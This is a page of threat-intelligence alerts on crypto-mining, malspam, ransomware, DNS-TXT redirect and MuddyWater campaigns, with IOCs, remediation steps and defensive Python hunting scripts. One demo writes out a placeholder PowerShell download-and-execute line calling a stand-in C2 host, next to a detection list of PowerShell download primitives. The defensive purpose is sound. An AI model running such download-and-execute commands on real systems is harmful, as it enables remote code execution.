Archive for category Threats

Rewterz Threat Alert – Advanced Attack Tools Target Non-patched Systems to Distribute Cryptocurrency Miners

Severity

Medium

Analysis Summary


A new campaign is targeting organizations around the world to deploy a cryptocurrency miner for profit. The delivery vector is a variant of Vools (Trojan.Win32.VOOLS.SMAL01), an EternalBlue-based backdoor used to drop cryptocurrency miners and other malware.

All of the compromised machines were running outdated versions of Windows and so remained exposed to vulnerabilities for which patches had long been available (EternalBlue abuses SMBv1 and was fixed by MS17-010 in March 2017).

Several other tools were found on the infected systems, chiefly the credential-dumping tool Mimikatz and Equation Group tooling. The final payload is a cryptocurrency miner. The compromised systems also appear to sit on internal network segments, which suggests the backdoor spread laterally over SMB after an initial foothold rather than being exploited directly from the internet.

The retrieved sample appears to be an installer that sends an HTTP check-in to the following server:
log.boreye[.]com/ipc.html?mac={MAC address}&ip={IP address}&host={host}&tick=6min&c=error_33

Another artifact common to all infected machines is a file in the Windows directory:
C:\Windows\NetworkDistribution\Diagnostics.txt. The .txt extension is meant to avoid scrutiny; the file is actually a ZIP archive containing the Equation toolkit components. Check the first bytes of the file (the "PK" ZIP header) rather than trusting its extension.

The miner binaries themselves are all variants of the open-source XMRig (Monero) miner.

The usernames configured in the miners are very similar and all of them use the same password, which suggests a single threat actor behind the campaign. The miner always uses the file name dllhostex.exe (note the extra "ex": the legitimate COM Surrogate is dllhost.exe) and is located in either the "System32" or the "SysWOW64" folder of the infected machine, depending on the miner variant.
Roughly 83% of affected computers were running Windows Server 2003 SP2, which has been out of support since July 2015.
Asian countries including China, India and Vietnam are among the top targets, and the affected industries include education, communications and media, banking, manufacturing, and technology.
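Hunting for these artifacts on a host and in proxy logs, as an added example (Python; this is not code from the original report): it tests whether Diagnostics.txt is really a ZIP by its magic bytes instead of its extension, looks for dllhostex.exe in the two miner locations, and parses the boreye.com check-in out of proxy-log lines. The fake Windows root, the archive contents and the log lines are constructed for the demo; the real archive members are not reproduced here.

```python
"""Hunt for the Vools / XMRig artifacts from the advisory above.

Checks performed (paths are relative to a Windows root so the same code can
run on a live host or a mounted disk image):
  1. NetworkDistribution/Diagnostics.txt is really a ZIP: test the magic bytes,
     not the extension.
  2. dllhostex.exe exists under System32 or SysWOW64 (the miner's fixed name).
  3. Proxy-log URLs matching the installer's check-in to log.boreye.com/ipc.html.
"""
import os
import tempfile
import zipfile
from urllib.parse import parse_qs, urlparse

ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")  # local header / empty / spanned
DIAG_RELATIVE = os.path.join("NetworkDistribution", "Diagnostics.txt")
MINER_DIRS = ("System32", "SysWOW64")
MINER_NAME = "dllhostex.exe"

BEACON_HOST = "log.boreye.com"
BEACON_PATH = "/ipc.html"
BEACON_KEYS = {"mac", "ip", "host", "tick", "c"}  # query fields seen in the check-in


def is_zip_masquerading(path):
    """True if the file starts with a ZIP signature, whatever its extension says."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) in ZIP_MAGIC
    except OSError:
        return False


def hunt_host(windows_root):
    """Return human-readable findings for one Windows installation root."""
    findings = []
    diag = os.path.join(windows_root, DIAG_RELATIVE)
    if is_zip_masquerading(diag):
        with zipfile.ZipFile(diag) as zf:
            members = zf.namelist()
        findings.append(f"ZIP disguised as text: {diag} (members: {members})")
    for sub in MINER_DIRS:
        miner = os.path.join(windows_root, sub, MINER_NAME)
        if os.path.isfile(miner):
            findings.append(f"miner binary present: {miner}")
    return findings


def parse_vools_beacon(url):
    """Return the check-in's query fields if `url` is the Vools beacon, else None."""
    u = urlparse(url if "://" in url else "http://" + url)
    if u.hostname != BEACON_HOST or u.path != BEACON_PATH:
        return None
    fields = {k: v[0] for k, v in parse_qs(u.query).items()}
    return fields if BEACON_KEYS.issubset(fields) else None


def scan_proxy_log(lines):
    """Return (client, fields) for each 'client METHOD url' line carrying the beacon."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3:
            fields = parse_vools_beacon(parts[-1])
            if fields:
                hits.append((parts[0], fields))
    return hits


# Constructed sample log: one beacon, one benign request, one lookalike on another path.
SAMPLE_PROXY_LOG = [
    "10.0.0.12 GET http://log.boreye.com/ipc.html?mac=00-0C-29-3A-1F-77&ip=10.0.0.12&host=FILESRV01&tick=6min&c=error_33",
    "10.0.0.13 GET http://www.example.com/index.html",
    "10.0.0.14 GET http://log.boreye.com/other.html?mac=x&ip=y&host=z&tick=6min&c=error_33",
]


def build_demo_root():
    """Create a throwaway fake Windows root carrying both on-disk artifacts (constructed data)."""
    root = tempfile.mkdtemp(prefix="vools_demo_")
    os.makedirs(os.path.join(root, "NetworkDistribution"))
    os.makedirs(os.path.join(root, "System32"))
    with zipfile.ZipFile(os.path.join(root, DIAG_RELATIVE), "w") as zf:
        zf.writestr("toolkit/placeholder.txt", "stand-in for the dropped components")
    with open(os.path.join(root, "System32", MINER_NAME), "wb") as fh:
        fh.write(b"MZ")  # only the name and location matter for this check
    return root


if __name__ == "__main__":
    for finding in hunt_host(build_demo_root()):
        print(finding)
    for client, fields in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} checked in as host={fields['host']} tick={fields['tick']} code={fields['c']}")
```

Point `hunt_host` at `C:\Windows` on a live host or at the Windows directory of a mounted image; the beacon parser matches on host, path and the full field set, so an unrelated request to another page on the same domain does not fire.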

Impact

  • Financial Loss
  • Credential Theft
  • Information Disclosure

Indicators of Compromise

URLs

  • miniast[.]com
  • tenchier[.]com
  • boreye[.]com
  • pilutce[.]com

Malware Hash (MD5/SHA1/SHA256)

  • ca7db2d555e67ba1f4560e68d5bc5b09 
  • 95786b6c28bf8dba7bbfeeba9e1ec27a 
  • 6dc722c9844e61427a47a2759a8fbec0 
  • 24f18c1c0f6df20f3c3e56eea5462e00 
  • f830f3004d4637f7ad9c61719a301d18 
  • 5138bcdab5d4282aed717ad1aa6de3d4 
  • 1263f5d06fd1859a4b3924c850bbf96c 
  • 291ae5d31b83ac269e9c0bb9025ee098 
  • 9fa4dbd6bbff6e96f54039a93dae8f22 
  • 297c855681a872f80aada938f60ef33a 
  • 928e86560d1e5a4765fdb8562a265f41 
  • 740e94f902e4d364615eb10a00c3ff31 
  • 5a7de0c6a03b02da8dea170c1e8259f5 
  • 7715e7b35ccf6a2d3ad0df6baff37abd 
  • 62fa403ff17613d0c42f793a41ada4a9 
  • 50462805c6843cff49378c5c3f3b4557 
  • 5910ad6f2d82357f4a97240f77376bea 
  • 0e02555ede71bc6c724f9f924320e020 
  • f7d7778f4bc5878abb4189557d1e4472 
  • c0f1f909331dbaab57dc6345e925ee6c 
  • 81a07515af6f2663b7bcfb2eec407af7 
  • a3cc9566f6f9f23a03a87b778b6f2a6e 
  • 830cf47825cce3b24ad80d5e80113aee 
  • a013bc89f72c0c343a32adb6d6a2342e 
  • 56da116d25207847797fe5f8b085c1b1 
  • 120dafffdb96a6032ba1e22056c26738 
  • be97f6bb2c385eaaa780661381c485ec 
  • 0cf2f1207d9fd85573f6c0e7f9e7d6a9 
  • f5a7b1f998390241f5c10cbddfe88647 
  • 9f34a7aa58700746bf20dc153c61e21d 
  • c61b2dfc2a87a5d73882f1a9b0437887 
  • 5bcfdaa021a6f47283d50fbf509843e9 
  • 268f7cc5ffc830238fc55984aca4fc39 
  • 35e65bd53c04a71c487c9f2660824efc 
  • dc932f52466f4cca3e246a3016ce988e 
  • d9356b4e0df28ff65ba22f9a69f1e150 
  • c694d4999f5a99cba82638c2dfbb3a95 
  • 0dd098c63e35d68cd99d9bbc798391b5 

Remediation

  • Block the threat indicators at respective controls.
  • Keep all systems up-to-date and patched against all known vulnerabilities; for this campaign that means MS17-010 (or SMBv1 disabled) on every remaining host, and retiring Windows Server 2003 systems that can no longer receive patches.
  • Hunt for dllhostex.exe under System32 and SysWOW64 and for C:\Windows\NetworkDistribution\Diagnostics.txt, and restrict SMB (TCP 445) between internal segments to limit lateral spread.

Rewterz Threat Alert – “Love You” Malspam Phishing Campaign Reemerged

Severity

Medium

Analysis Summary

A malspam campaign used love-letter themed subject lines and a ZIP attachment whose name begins with "Love_You_". The archive contains a JavaScript file which, when run, issues several HTTP requests to download further executables: a Monero cryptocurrency miner, the Phorpiex spambot, and GandCrab ransomware. Phorpiex joins the victim host to a botnet and makes it mail copies of the malicious ZIP to new targets, while the host's files are encrypted by the ransomware and its CPU is used to mine cryptocurrency.

Impact

  • File encryption
  • Cryptocurrency mining on the victim host
  • Host joined to a spam botnet and used to propagate the campaign

Indicators of Compromise

IP(s) / Hostname(s)

  • 92[.]63[.]197[.]48
  • 198[.]105[.]244[.]228
  • 78[.]46[.]77[.]98
  • 217[.]26[.]53[.]161
  • 74[.]220[.]215[.]73
  • 136[.]243[.]13[.]215
  • 138[.]201[.]162[.]99


URLs

  • slpsrgpsrhojifdij[.]ru
  • osheoufhusheoghuesd[.]ru
  • suieiusiueiuiuushgf[.]ru
  • www[.]2mmotorsport[.]biz
  • www[.]haargenau[.]biz
  • www[.]bizziniinfissi[.]com
  • www[.]holzbock[.]biz
  • www[.]fliptray[.]biz
  • gandcrabmfe6mnef[.]onion


Malware Hash (MD5/SHA1/SHA256)

  • 72429571f4ca62fceb5a4fc0a17a8f8ab88c1ed01b9d657f7e9778c7939cea06
  • 27ac0e9011294c2152d224052280f7fa434df572809a6f96f9a306f3d5c965e3
  • 99a1e83e77850b59995cdf29b61e9f29f9c38882363027668030df0a62059645
  • 06e61032bccfe0ccd51ddbab480e1eb6392bccb318639ecac0092e96b9d794ad
  • 7818e108a16f096eb71feb564ce92095c4ac1e613933630169cc16606bb5f68d
  • 0a27af16b991cbe0f5445022cb1d752a9144abeede6b8de0055247e6fd6c1698
  • 32ee086fbc82ddd0675c0293656f813493ce6d96d02e0bcbeccee4d1a6adfb20
  • 12e3038b2ed0663cba3c6a05ac0a27b61dce694dffc27aafb4cb3f2f229ff6b8
  • 6ad3e68e2e8c5088bc8544bc230a2e333645d3c246ace772bf61f80cd0e93002
  • 99fe714a365f8e4a74687592700b27f2016a59c7527b5d4ef7cfd97e63468349
  • d189f44528dfa3f8dba2632ae26f564a37931cb89668d31402fc7fb05ae63c1a
  • c3683096f91b00dfe248e388b4302d5471fb090ab8092c96c991a467c26f26b0
  • f3c369edc2ea96465c49a14f64bdce83c0a401e0ae12e809bced8f99b977c5dc
  • f4d3ba58e91dc95877ba13804df6fe307ef6efcef74d3a00792387625a624cf4
  • 9ff78056e225c08ef1f1ff71f305201387f3ec766c8727361851287a74de1f45
  • ba23af4480611fb19fad2cd83a41bd347d183e0ef8e1c5477916bebe32955d87
  • cf9a20874089ec7aa1a84a27f74928c71266a684e7fee4c1ac8d37aaf57d6bf2
  • 0de30f9dbe37aea5932e5df85b4f1aa5cefe28f3bffb58d4d8ae40ccd040a4a7
  • 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
  • 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
  • 035ae8f389e0a4cb58428d892123bc3e3b646e4387c641e664c5552228087285
  • b8bf5b607b305139db81c48e96010a67768488b01edc8c615306ed303c545b0d
  • 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b

Remediation

  • Block all threat indicators at your respective controls.
  • Treat emails from unknown senders with suspicion.
  • Never open links or attachments from unknown senders.


Rewterz Threat Alert – Malspam Campaign Delivering Malicious Files Using Compromised Windstream Email Addresses

Severity

Medium

Analysis Summary

A malspam campaign in which the victim receives an email with the subject "Order Inquiry" from "Sales hofbraurestaurant[@]windstream[.]net". The body invites the recipient to open the attachment "Order1002 Quotation.zip" to review an order. The infection chain starts when the archive is opened and its contents executed, and ends with the Orion keylogger installed on the victim's system. Note that the sending account on windstream.net appears to be compromised rather than spoofed: the mail therefore passes sender-authentication checks such as SPF and DKIM, so those checks cannot be relied on to catch it. Filter on the sender address, subject, attachment name and hashes below instead.
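Triage logic for the two malspam campaigns above (the "Love You" ZIPs carrying a JavaScript downloader, and the Windstream "Order Inquiry" mails from a compromised account), as an added example in Python that is not the advisory's own code. It parses a MIME message, looks inside ZIP attachments for script payloads, matches sender, subject and attachment name against the published indicators, and records the SPF/DKIM result separately so the verdict never depends on it. The three messages, the ZIP members and the Authentication-Results header are constructed for the demo; the real payload file names are not known from the page and are replaced by placeholders.

```python
"""Triage one inbound message against the two malspam campaigns above.

Extracts sender, subject and attachments, looks inside ZIP attachments for
script members, matches names against the published indicators and records
whether SPF/DKIM passed: for a compromised legitimate account they do,
which is exactly why the verdict must not depend on them.
"""
import email
import hashlib
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".cmd", ".bat", ".exe", ".scr")

# Indicators taken from the advisory text (defanging removed).
IOC_SENDERS = {"hofbraurestaurant@windstream.net"}
IOC_SUBJECTS = {"order inquiry"}
IOC_ATTACHMENT_NAMES = {"order1002 quotation.zip"}
IOC_ATTACHMENT_PREFIXES = ("love_you_",)


def zip_script_members(data):
    """Script-like member names inside a ZIP given as bytes; [] if it is not a ZIP."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return []
    return [n for n in names if n.lower().endswith(SCRIPT_EXTENSIONS)]


def triage_message(raw_bytes):
    """Parse an RFC 5322 message and return the indicator matches found in it."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    sender = str(msg.get("From", "")).lower()
    m = re.search(r"<([^>]+)>", sender)
    sender_addr = m.group(1) if m else sender.strip()
    auth = str(msg.get("Authentication-Results", "")).lower()
    findings = {
        "sender_ioc": sender_addr in IOC_SENDERS,
        "subject_ioc": str(msg.get("Subject", "")).strip().lower() in IOC_SUBJECTS,
        "auth_pass": "spf=pass" in auth and "dkim=pass" in auth,
        "attachments": [],
    }
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""
        findings["attachments"].append({
            "name": name,
            "sha256": hashlib.sha256(data).hexdigest(),  # compare with the hash lists above
            "name_ioc": name in IOC_ATTACHMENT_NAMES or name.startswith(IOC_ATTACHMENT_PREFIXES),
            "script_members": zip_script_members(data),
        })
    return findings


def verdict(findings):
    """'block' on any indicator match or scripted ZIP; SPF/DKIM results do not rescue a message."""
    attachment_hit = any(a["name_ioc"] or a["script_members"] for a in findings["attachments"])
    return "block" if findings["sender_ioc"] or findings["subject_ioc"] or attachment_hit else "allow"


def build_sample(sender, subject, zip_name, member_name):
    """Constructed test message with a one-member ZIP; the member is an inert placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, "placeholder, not the campaign's real payload")
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "victim@example.com"
    msg["Subject"] = subject
    # A compromised but genuine account authenticates cleanly; this header mimics that.
    msg["Authentication-Results"] = "mx.example.com; spf=pass smtp.mailfrom=windstream.net; dkim=pass header.d=windstream.net"
    msg.set_content("Please review the attached order.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename=zip_name)
    return msg.as_bytes()


WINDSTREAM_SAMPLE = build_sample("Sales <hofbraurestaurant@windstream.net>", "Order Inquiry",
                                 "Order1002 Quotation.zip", "payload_placeholder.exe")
LOVE_YOU_SAMPLE = build_sample("someone@example.org", "I love you",
                               "Love_You_2019_12345.zip", "Love_You_12345.js")
BENIGN_SAMPLE = build_sample("colleague@example.org", "Q3 report", "report.zip", "report.pdf")

if __name__ == "__main__":
    for label, raw in (("windstream", WINDSTREAM_SAMPLE), ("love_you", LOVE_YOU_SAMPLE), ("benign", BENIGN_SAMPLE)):
        f = triage_message(raw)
        print(label, verdict(f), "auth_pass=%s" % f["auth_pass"], f["attachments"][0]["name"])
```

The Windstream sample is blocked even though `auth_pass` is true, which is the point of the advisory's note about the compromised account; the "Love You" sample is blocked on the attachment name prefix and on the .js member without any sender or subject indicator at all.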

Indicators of Compromise

IP(s) / Hostname(s)

  • 104[.]27[.]183[.]176
  • 192[.]254[.]234[.]204

URLs

  • puu[.]sh
  • mail[.]fajr[.]com
  • http[:]//puu[.]sh/jMSLc[.]txt
  • https[:]//puu[.]sh/y0rxd[.]dll

Filename

Order1002 Quotation.zip

Email Address

hofbraurestaurant[@]windstream[.]net

Email Subject

Order Inquiry

Malware Hash (MD5/SHA1/SHA256)

  • ee337babef9c414fc6bd473869a77ae7c81a0af0b62cda4b7a96abc71200e433
  • f740df4d3a6c0b378116b48c1ed18a36e82938cf7dcaaba58f0ba8101f3e3531
  • 49f3b5a15708161cb0b2d862c80e670da499675c
  • 1570b3df76464a41c9ddebbcfb5f9f93

Remediation

  • Block all threat indicators at your respective controls.
  • Treat emails from unknown senders with suspicion.
  • Never open links or attachments from unknown senders.

Rewterz Threat Alert – Buran Ransomware

Severity

High

Analysis Summary

Buran is a new variant of the Vega ransomware, distributed through the RIG exploit kit. Once on the victim system the ransomware writes itself to a file named ctfmon.exe, executes, and begins encryption. As is typical of ransomware, it carries an exclusion list of directories, files and file extensions that are not to be encrypted. Encrypted files get the victim's unique ID appended as the file extension and the string "Buran" written at the head of the file.

Impact

File encryption

Indicators of Compromise

Filename

ctfmon[.]exe

Email Address

  • polssh1@protonmail[.]com
  • polssh@protonmail[.]com

Malware Hash (MD5/SHA1/SHA256)

0bed6711e6db24563a66ee99928864e8cf3f8cff0636c1efca1b14ef15941603

Remediation

  • Block all threat indicators at your respective controls.
  • ctfmon.exe is also the name of a legitimate Windows component (the CTF Loader of the Text Services Framework, in %SystemRoot%\System32), so hunt on the hash above and on copies of ctfmon.exe running from any other path, not on the file name alone.
  • Keep browsers and their plugins patched, since the RIG exploit kit delivers the payload through drive-by exploitation, and maintain offline backups.


Rewterz Threat Alert – DNS Compromise Attack Phishing Spam

Severity

Medium

Analysis Summary

A new finance-themed spam campaign with HTML attachments uses Google's public DNS resolver to retrieve JavaScript commands embedded in a domain's TXT record. The commands redirect the user's browser to an aggressive trading-advertisement site that has been reported as a scam. Because the lookup goes to a trusted resolver over HTTPS and the payload lives in DNS rather than on a web server controlled by the attacker, the redirect target can be changed at any time without touching the attachment already in victims' inboxes.

All the emails were very simple, each carrying an HTML attachment (image in the original post: a sample scam email).

All the emails came from IP addresses previously associated with the Necurs botnet. The sender domains shown in the From header do not resolve to the IP addresses the messages actually came from.

The script in the attachment (image in the original post: the fake invoice HTML file).
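The defender's side of the DNS TXT trick described above, as an added example in Python (not code from the original post). The attachment's script asks Google's resolver, through its JSON API at dns.google/resolve, for a TXT record and runs what comes back; this block classifies proxy-log URLs so that browsers fetching TXT records over that API stand out, and decodes the resolver's JSON answer the way the page would, flagging TXT strings that look like JavaScript. The domain, the redirect target, the log lines and the resolver answer are all constructed placeholders, not the campaign's real record.

```python
"""Detect the DNS TXT staging used by the HTML-attachment spam above.

Two defender-side pieces: classify proxy-log URLs so that browsers fetching
TXT records over the resolver's JSON API stand out, and decode the
resolver's JSON answer to see whether the TXT data carries script.
"""
import json
import re
from urllib.parse import parse_qs, urlparse

DOH_JSON_HOSTS = {"dns.google", "dns.google.com"}
TXT_RRTYPE = 16  # RFC 1035 TXT
JS_MARKERS = ("location.href", "location.replace", "window.open", "document.write", "eval(", "settimeout(")


def is_doh_txt_lookup(url):
    """True for a JSON-API TXT lookup such as https://dns.google/resolve?name=x&type=TXT."""
    u = urlparse(url)
    if u.hostname not in DOH_JSON_HOSTS or u.path != "/resolve":
        return False
    rtype = parse_qs(u.query).get("type", ["A"])[0].upper()
    return rtype in ("TXT", str(TXT_RRTYPE))


def txt_strings_from_doh(body):
    """Return the TXT record payloads from a Google JSON DNS answer body."""
    doc = json.loads(body)
    out = []
    for answer in doc.get("Answer", []):
        if answer.get("type") != TXT_RRTYPE:
            continue
        # The API renders each TXT RR as one or more double-quoted character strings.
        pieces = re.findall(r'"((?:[^"\\]|\\.)*)"', answer.get("data", ""))
        out.append("".join(pieces).replace('\\"', '"'))
    return out


def looks_like_javascript(text):
    """Cheap heuristic: redirect/eval primitives that a TXT record has no business holding."""
    lowered = text.lower()
    return any(marker in lowered for marker in JS_MARKERS)


def triage_doh_response(body):
    """TXT strings in a resolver answer that contain script-looking content."""
    return [s for s in txt_strings_from_doh(body) if looks_like_javascript(s)]


def doh_txt_clients(log):
    """Clients in a (client, method, url) proxy log that performed JSON-API TXT lookups."""
    return [client for client, _method, url in log if is_doh_txt_lookup(url)]


# Constructed proxy log and a constructed resolver answer; the domain, the redirect
# target and the script are placeholders, not the campaign's actual record.
SAMPLE_LOG = [
    ("10.1.1.5", "GET", "https://dns.google/resolve?name=cmd.example.invalid&type=TXT"),
    ("10.1.1.6", "GET", "https://www.example.com/"),
    ("10.1.1.7", "GET", "https://dns.google/resolve?name=www.example.com&type=A"),
]
SAMPLE_DOH_RESPONSE = json.dumps({
    "Status": 0,
    "Question": [{"name": "cmd.example.invalid.", "type": 16}],
    "Answer": [
        {"name": "cmd.example.invalid.", "type": 16, "TTL": 300,
         "data": "\"window.location.replace('https://trading-ad.example.invalid/')\""},
        {"name": "cmd.example.invalid.", "type": 16, "TTL": 300, "data": "\"v=spf1 -all\""},
    ],
})

if __name__ == "__main__":
    print("clients doing TXT lookups via dns.google:", doh_txt_clients(SAMPLE_LOG))
    for s in triage_doh_response(SAMPLE_DOH_RESPONSE):
        print("script in TXT record:", s)
```

Browsers have no legitimate reason to call the resolver's JSON API for TXT records, so the first check is a low-noise alert on its own; the second check is what lets an analyst pull the live payload for a flagged domain and confirm where victims are being sent.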

Indicators of Compromise

URLs

  • appteslerapp[.]com
  • fetch[.]bucsgwbno[.]samaste[.]net
  • fetch[.]faonwvzso[.]ourmazdcompany[.]net
  • fetch[.]kkqhoniv[.]baranweddings[.]com
  • fetch[.]nukss[.]hrhuae[.]com
  • fetch[.]pebabsacc[.]sarahelizabethjewelry[.]com
  • fetch[.]qedrbzpzzx[.]baranevents[.]com
  • http[:]//www[.]1835bfg36abp[.]ctifsouteni[.]icu/456[.]xn--html-sw3b
  • http[:]//www[.]14534bfg36abp[.]etapportert[.]icu/5436[.]xn--html-sw3b
  • http[:]//www[.]488bfg36abp[.]ffrirbesoin[.]icu/1446[.]xn--html-sw3b
  • http[:]//www[.]5438bfg36abp[.]ffrirbesoin[.]icu/3643[.]xn--html-sw3b
  • http[:]//www[.]55696bfg36abp[.]ielassocier[.]icu/7467[.]xn--html-sw3b
  • http[:]//www[.]66688bfg36abp[.]ffrirbesoin[.]icu/3161[.]xn--html-sw3b
  • http[:]//www[.]7913bfg36abp[.]etapportert[.]icu/33476[.]xn--html-sw3b
  • http[:]//www[.]81934bfg36abp[.]etapportert[.]icu/3185[.]xn--html-sw3b
  • https[:]//appteslerapp[.]com/
  • ns1[.]firstdnshoster[.]com
  • ns[.]firstdnshoster[.]com
  • www[.]1835bfg36abp[.]ctifsouteni[.]icu
  • www[.]14534bfg36abp[.]etapportert[.]icu
  • www[.]488bfg36abp[.]ffrirbesoin[.]icu
  • www[.]5438bfg36abp[.]ffrirbesoin[.]icu
  • www[.]55696bfg36abp[.]ielassocier[.]icu
  • www[.]66688bfg36abp[.]ffrirbesoin[.]icu
  • www[.]7913bfg36abp[.]etapportert[.]icu
  • www[.]81934bfg36abp[.]etapportert[.]icu

Remediation

  • Block threat indicators at your respective controls.
  • Treat emails from unknown senders with suspicion.
  • Never open links or attachments from unknown senders.

Rewterz Threat Alert – New MuddyWater Activities Uncovered

Severity

High

Analysis Summary

In one MuddyWater campaign, the group sent spear-phishing emails to a university in Jordan and to the Turkish government. In both cases the group did not spoof the sender addresses of these legitimate entities; it used compromised legitimate accounts to trick recipients into installing malware.

The group deployed a new multi-stage PowerShell backdoor, POWERSTATS v3. The spear-phishing email carries a document with a malicious macro that drops a VBE file encoded with the Microsoft Script Encoder. The VBE file holds a base64-encoded block containing obfuscated PowerShell, which is decoded and saved to the %PUBLIC% directory under various names ending in image extensions such as .jpeg and .png before being executed. The PowerShell uses custom string obfuscation and large amounts of junk code to hinder analysis.

Once all strings are deobfuscated and the junk code removed, the backdoor logic can be read. It first collects operating system information and saves the result to a log file.

This file is later uploaded to the command-and-control (C&C) server. Each victim machine generates a random GUID that serves as its identifier. The malware then enters an infinite loop, polling a folder on the C&C server for a file named after that GUID. If the file exists it is downloaded and executed with powershell.exe. This lets the operators task a specific victim asynchronously, in particular by staging a second backdoor payload on the C&C server for download and installation.
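Two hunts that follow from the staging described above, as an added example in Python (not Rewterz's or the original researchers' code): files under %PUBLIC% that carry an image extension but are not images and instead hold base64-encoded PowerShell, and proxy-log clients that repeatedly request a GUID-named resource from one server, which is what the tasking loop looks like from the network. The stand-in %PUBLIC% directory, the inert placeholder script, the C&C host name and the log lines are constructed; the GUID and host in them are not indicators.

```python
"""Hunt for the POWERSTATS v3 staging described above.

Two checks, both demonstrated on constructed data:
  1. Files under %PUBLIC% with image extensions whose bytes are not an image
     but decode, as base64, to PowerShell (the dropper parks its script as
     .jpeg/.png there).
  2. Proxy-log lines in which one client keeps requesting a GUID-named
     resource from the same server: the backdoor polling for its tasking file.
"""
import base64
import os
import re
import tempfile
from collections import Counter

IMAGE_MAGIC = {".jpeg": b"\xff\xd8\xff", ".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}
PS_TOKENS = ("invoke-expression", "iex ", "frombase64string", "downloadstring",
             "net.webclient", "-encodedcommand", "-windowstyle hidden")
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
GUID_PATH = re.compile(r"/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.\w+)?$", re.I)


def decode_embedded_powershell(data):
    """Return PowerShell text hidden as a base64 blob inside `data`, or None."""
    for blob in B64_BLOB.findall(data):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        # -EncodedCommand payloads are UTF-16LE; interleaved NULs give them away.
        text = raw.decode("utf-16-le" if raw[1:2] == b"\x00" else "utf-8", "ignore")
        if any(tok in text.lower() for tok in PS_TOKENS):
            return text
    return None


def scan_fake_images(public_dir):
    """(path, script) for image-named files that are not images and hide PowerShell."""
    findings = []
    for name in sorted(os.listdir(public_dir)):
        ext = os.path.splitext(name)[1].lower()
        if ext not in IMAGE_MAGIC:
            continue
        path = os.path.join(public_dir, name)
        with open(path, "rb") as fh:
            data = fh.read()
        if data.startswith(IMAGE_MAGIC[ext]):
            continue  # genuine image header, leave it
        script = decode_embedded_powershell(data)
        if script:
            findings.append((path, script))
    return findings


def guid_pollers(log_lines, min_requests=3):
    """{(client, server, guid): hits} for clients repeatedly fetching a GUID-named file."""
    counts = Counter()
    for line in log_lines:
        client, _method, url = line.split()[:3]
        m = re.match(r"https?://([^/]+)(/.*)$", url)
        if not m:
            continue
        server, path = m.groups()
        g = GUID_PATH.search(path)
        if g:
            counts[(client, server, g.group(1).lower())] += 1
    return {k: v for k, v in counts.items() if v >= min_requests}


def build_demo_public():
    """Constructed %PUBLIC% stand-in: one real-looking PNG header, one fake .jpeg."""
    d = tempfile.mkdtemp(prefix="public_demo_")
    with open(os.path.join(d, "wallpaper.png"), "wb") as fh:
        fh.write(IMAGE_MAGIC[".png"] + b"\x00" * 32)
    # Inert placeholder downloader; the host name is not a real indicator.
    ps = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/tmp.php')"
    with open(os.path.join(d, "stage.jpeg"), "wb") as fh:
        fh.write(b"junk " + base64.b64encode(ps.encode()) + b" junk")
    return d


# Constructed proxy log: one host polling its GUID file three times, plus two bystanders.
SAMPLE_PROXY_LOG = [
    "10.2.0.9 GET http://c2.example.invalid/data/3f2504e0-4f89-11d3-9a0c-0305e82c3301",
    "10.2.0.9 GET http://c2.example.invalid/data/3f2504e0-4f89-11d3-9a0c-0305e82c3301",
    "10.2.0.9 GET http://c2.example.invalid/data/3f2504e0-4f89-11d3-9a0c-0305e82c3301",
    "10.2.0.10 GET http://www.example.com/index.html",
    "10.2.0.11 GET http://cdn.example.com/assets/3f2504e0-4f89-11d3-9a0c-0305e82c3301.css",
]

if __name__ == "__main__":
    for path, script in scan_fake_images(build_demo_public()):
        print(path, "->", script)
    for (client, server, guid), n in guid_pollers(SAMPLE_PROXY_LOG).items():
        print(f"{client} polled {server} for {guid} {n} times")
```

On a real host run `scan_fake_images` over `C:\Users\Public` and its subfolders; the magic-byte test keeps genuine wallpapers out of the results, and the threshold in `guid_pollers` is what separates a polling loop from a one-off download of a GUID-named asset from a CDN.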

In the observed second stage, another backdoor was downloaded. It supports the following commands:

  • Take screenshots
  • Command execution via the cmd.exe binary
  • Any input without a recognised keyword is treated as PowerShell code and executed via the Invoke-Expression cmdlet.

The C&C communication is done using PHP scripts with a hardcoded token and a set of backend functions, e.g., sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Indicators of Compromise

IP(s) / Hostname(s)

  • 103[.]13[.]67[.]4
  • 80[.]80[.]163[.]182
  • 80[.]90[.]87[.]201
  • 91[.]187[.]114[.]210
  • 78[.]129[.]139[.]131
  • 192[.]168[.]1[.]104:54863 (RFC 1918 private address, most likely from the analysis environment; not a blockable indicator)
  • 163[.]172[.]147[.]222:4555

URLs

  • hxxp://78[.]129[.]139[.]148
  • hxxp://31[.]171[.]154[.]67
  • hxxp://79[.]106[.]224[.]203
  • hxxp://185[.]34[.]16[.]82
  • hxxp://104[.]237[.]233[.]17
  • hxxp://46[.]99[.]148[.]96
  • hxxp://134[.]19[.]215[.]3:443
  • hxxp://gladiyator[.]tk
  • hxxp://51[.]77[.]97[.]65
  • hxxp://185[.]14[.]248[.]26
  • hxxp://185[.]162[.]235[.]182
